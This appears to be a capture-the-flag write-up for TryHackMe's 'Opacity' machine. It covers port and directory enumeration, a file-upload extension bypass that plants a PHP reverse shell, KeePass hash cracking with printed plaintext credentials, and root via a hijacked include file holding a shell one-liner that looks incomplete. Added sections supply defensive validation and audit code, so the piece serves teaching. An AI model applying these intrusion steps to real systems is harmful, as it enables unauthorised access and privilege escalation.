Writeup for the room Opacity from TryHackMe

Tags: Writeups TryHackMe Boot2Root Web Network

Machine Information

Initial Enumeration

As always, we start with an nmap scan to map the network services running on the machine:

└─$ nmap -p- -sV -T4 --min-rate=10000 opacity.thm | tee nmap.log
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-16 18:15 EDT
Warning: opacity.thm giving up on port because retransmission cap hit (6).
Nmap scan report for opacity.thm (opacity.thm)
Host is up (0.14s latency).
Not shown: 62210 closed tcp ports (conn-refused), 3321 filtered tcp ports (no-response)
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.03 seconds

HTTP (80)

At first glance, the website gives us a login form. I tried a couple of authentication bypass and SQLi techniques, but the login ended up being secure?


Directory Enumeration:

└─$ gobuster dir -u http://opacity.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt| tee dirs.log
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://opacity.thm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
2023/05/13 19:01:26 Starting gobuster in directory enumeration mode
/css                  (Status: 301) [Size: 308] [--> http://opacity.thm/css/]
/cloud                (Status: 301) [Size: 310] [--> http://opacity.thm/cloud/]

The /cloud directory seems to be a Personal Cloud Storage that stores "images" for 5 minutes,
so we can fool it and establish an initial foothold by uploading a reverse shell.
The upload feature needs an external URL to download from, so we need to host
our own HTTP server.

Samba (139/445)

SMB Enumeration:

└─$ enum4linux opacity.thm


[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sysadmin (Local User)

local user: sysadmin

Initial Foothold

To establish a foothold we have to upload our reverse shell script to the server via the /cloud service.
At first I thought it would have some filters, but there were none; it only needs the extension to exist in
the input field.

Hosting our reverse shell: pentestmonkey reverse-shell

└─$ python3 -m http.server
Serving HTTP on port 8000 ( ...

Listening for connections:

└─$ nc -lvnp 4444
listening on [any] 4444 ...

After trying to upload my shell as shell.php.png and shell.php without success,
adding a [space] followed by .png after the .php file extension (shell.php .png) seems to work!


Now that we were able to upload our reverse shell, we get redirected to /cloud/storage.php,
and our shell script is stored at http://opacity.thm/cloud/images/shell.php .png . Requesting that URL
without the trailing .png triggers our shell script and gives us shell access to the machine!
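The bypass works because the upload handler only looks for an allowed extension somewhere in the submitted string. As an added example (not code from the room or from this writeup; the real application is PHP, this is a Python model of the same decision), here is the check such a handler should make instead: work on the basename of the URL path, accept exactly one allowlisted extension with no whitespace, and confirm the downloaded bytes carry that image type's magic header. The function names and ALLOWED_TYPES table are assumptions for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Allowlisted image extensions and the magic bytes a file of that type starts with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# One stem, one dot, one allowlisted extension, no whitespace or extra dots.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif)", re.IGNORECASE)


def weak_check(url: str) -> bool:
    """Model of the check the writeup observed: the extension merely has to
    appear somewhere in the submitted string, so 'shell.php .png' passes."""
    return any("." + ext in url.lower() for ext in ALLOWED_TYPES)


def safe_image_name(url: str):
    """Return the filename to store the download under, or None to reject.

    Only the basename of the URL *path* is considered, so query strings,
    directory components and 'shell.php .png' (space + second extension)
    are all rejected before anything is fetched."""
    name = posixpath.basename(urlsplit(url).path)
    if not _SAFE_NAME.fullmatch(name):
        return None
    return name.lower()


def content_matches(name: str, data: bytes) -> bool:
    """After download, confirm the bytes really are the claimed image type,
    so PHP source renamed to .png is still refused."""
    ext = name.rsplit(".", 1)[1].lower()
    return data.startswith(ALLOWED_TYPES[ext])


def vet_upload(url: str, data: bytes):
    """Full decision for one upload request: storage filename or None."""
    name = safe_image_name(url)
    if name is None or not content_matches(name, data):
        return None
    return name
```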


Getting Stable Shell:

www-data@opacity:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@opacity:/$ export TERM=xterm

But we are still www-data; we don't even have a user account yet.

Privilege Escalation

Before uploading any script that helps with privilege escalation, like linPEAS, I usually check for interesting scripts and files
in directories like /tmp, /opt and, of course, the local user's home directory: /home/sysadmin.

In the /opt directory there is a KeePassXC database. KeePassXC is an offline, open-source password manager,
so this is a nice find because we can try to crack the master password!

www-data@opacity:/$ ls /opt

www-data to sysadmin

Hosting an http server in our target’s machine:

www-data@opacity:/opt$ python3 -m http.server
Serving HTTP on port 8000 ( ...

Downloading the KeePassXC database file to our machine:

└─$ wget http://opacity.thm:8000/dataset.kdbx

Getting the keepass hash using the keepass2john script:

└─$ keepass2john dataset.kdbx > keepass_hash

Cracking the hash using John The Ripper:

└─$ john keepass_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (dataset)     
1g 0:00:00:11 DONE (2023-05-16 19:36) 0.08826g/s 77.31p/s 77.31c/s 77.31C/s chichi..melvin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Opening the database file in KeePassXC using the password 741852963:

└─$ keepassxc dataset.kdbx 


Creds: sysadmin : Cl0udP4ss40p4city#8700

Login as sysadmin:

www-data@opacity:/$ su sysadmin
Password: Cl0udP4ss40p4city#8700


sysadmin@opacity:~$ cat local.txt

Now that we are logged in as sysadmin we can look for a way to get root on the machine,
but before we do that, logging in via SSH is a good idea.

sysadmin to root

In /home/sysadmin/ there is a directory called scripts, and inside it
a PHP script that uses a bunch of libraries from lib/.



<?php
// The script pulls its helpers from lib/ (the writeup names lib/backup.inc.php,
// which provides zipData()); the exact include line is not shown on the page.
require_once __DIR__ . '/lib/backup.inc.php';

//Backup of scripts sysadmin folder
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;

//Files scheduled removal: empty the cloud images directory (the 5-minute retention)
$dir = "/var/www/html/cloud/images";
$di = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);
$ri = new RecursiveIteratorIterator($di, RecursiveIteratorIterator::CHILD_FIRST);
foreach ($ri as $file) {
    $file->isDir() ? rmdir($file) : unlink($file);
}

And the funny thing is that we own the lib directory, so we can move/copy files in it:

sysadmin@opacity:~/scripts$ ls -ld lib/
drwxr-xr-x 2 sysadmin root 4096 Jul 26  2022 lib/

Because the script uses lib/backup.inc.php, we can move that file out to /home/sysadmin,
create a new file with the same name, and sneak in a reverse shell script, so that every time the script
runs it triggers our reverse shell.

sysadmin@opacity:~/scripts/lib$ mv backup.inc.php ../..

Now we create the file ourselves, so that we are the owner and can write to it:

sysadmin@opacity:~/scripts/lib$ touch backup.inc.php
sysadmin@opacity:~/scripts/lib$ ls -ld backup.inc.php 
-rw-rw-r-- 1 sysadmin sysadmin 0 May 17 07:54 backup.inc.php

sysadmin@opacity:~/scripts/lib$ cat backup.inc.php 

exec("sh <&3 >&3 2>&3");


Now wait for the script to run, and we have root!

└─$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [] from (UNKNOWN) [opacity.thm] 50722
uid=0(root) gid=0(root) groups=0(root)
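The root cause of this escalation is a script run as root that includes a file from a directory its non-root owner can write to (lib/ is owned by sysadmin, so backup.inc.php can be moved and replaced). The following audit is an added example, not code from the room or this writeup: given a PHP script that cron runs as root, it reports every include/require target whose file, or any directory between that file and the script's own directory, can be modified by a user other than the one the job runs as. It assumes include arguments are string literals, optionally prefixed with __DIR__, and that the script's own directory and everything above it is trusted; the function names are illustrative.

```python
import os
import re
import stat

# include/require with a string-literal argument, optionally prefixed by __DIR__ .
# e.g.  require_once __DIR__ . '/lib/backup.inc.php';
_INCLUDE_RE = re.compile(
    r"""\b(?:include|require)(?:_once)?\s*\(?\s*(__DIR__\s*\.\s*)?['"]([^'"]+)['"]"""
)


def writable_by_untrusted(path: str, trusted_uid: int):
    """Reason string if a user other than trusted_uid can modify path, else None."""
    st = os.lstat(path)
    if st.st_uid != trusted_uid and st.st_mode & stat.S_IWUSR:
        return f"owned by uid {st.st_uid}, not by uid {trusted_uid}"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "group/world writable"
    return None


def audit_includes(script_path: str, trusted_uid: int = 0):
    """List (path, reason) for every include target that can be hijacked.

    Each directory from the included file up to the script's own directory is
    checked: a writable directory lets the file be moved and replaced even when
    the file itself is root-owned, which is exactly the lib/ case above."""
    script_path = os.path.abspath(script_path)
    script_dir = os.path.dirname(script_path)
    with open(script_path, encoding="utf-8", errors="replace") as fh:
        source = fh.read()
    findings = []
    for dir_prefix, literal in _INCLUDE_RE.findall(source):
        if dir_prefix:
            target = os.path.normpath(script_dir + "/" + literal.lstrip("/"))
        elif os.path.isabs(literal):
            target = os.path.normpath(literal)
        else:
            target = os.path.normpath(os.path.join(script_dir, literal))
        chain = [target] if os.path.exists(target) else []  # missing file: parent still matters
        d = os.path.dirname(target)
        while True:
            chain.append(d)
            if d in (script_dir, os.path.dirname(d)):  # stop at script dir or filesystem root
                break
            d = os.path.dirname(d)
        for p in chain:
            reason = writable_by_untrusted(p, trusted_uid)
            if reason:
                findings.append((p, reason))
    return findings
```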

Thank You For Reading ❤